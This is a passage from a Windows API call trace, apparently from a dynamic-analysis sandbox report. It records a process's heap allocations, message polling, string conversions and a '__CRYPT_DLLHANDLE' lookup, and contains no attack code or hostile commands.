lpMsg=0x144eb54) returned 0 [0132.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0132.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0132.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0132.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0132.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0132.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0132.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0132.109] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0132.110] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0132.110] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0132.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0132.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.110] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0132.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e28a8 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2788 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0132.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0132.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2bd8 [0132.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0132.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0132.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0132.110] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0132.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0132.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0132.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0132.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0132.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0132.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0132.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0132.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0132.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0132.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0132.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0132.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0132.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0132.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0132.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0132.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0132.111] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0132.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0132.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0132.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0132.111] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0132.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0132.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0132.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0132.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0132.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0132.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0132.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0132.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0132.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0132.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0132.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b18 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0132.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0132.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0132.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0132.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0132.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0132.113] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0132.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0132.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0132.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2bd8 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e27e8 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0132.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2c08 [0132.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0132.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0132.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0132.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0132.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0132.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2788 [0132.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.114] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0132.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0132.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0132.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0132.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0132.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0132.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392458 [0132.114] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392458 | out: hHeap=0x1780000) returned 1 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0132.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cada8 [0132.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0132.114] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0132.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0132.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0132.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0132.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0132.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0132.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0132.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0132.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0132.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0132.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0132.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0132.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0132.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0132.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0132.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0132.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0132.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0132.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0132.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0132.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0132.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0132.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0132.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0132.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0132.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0132.117] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0132.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0132.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0132.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0132.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0132.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0132.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0132.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0132.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0132.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0132.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0132.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0132.117] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0132.117] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) 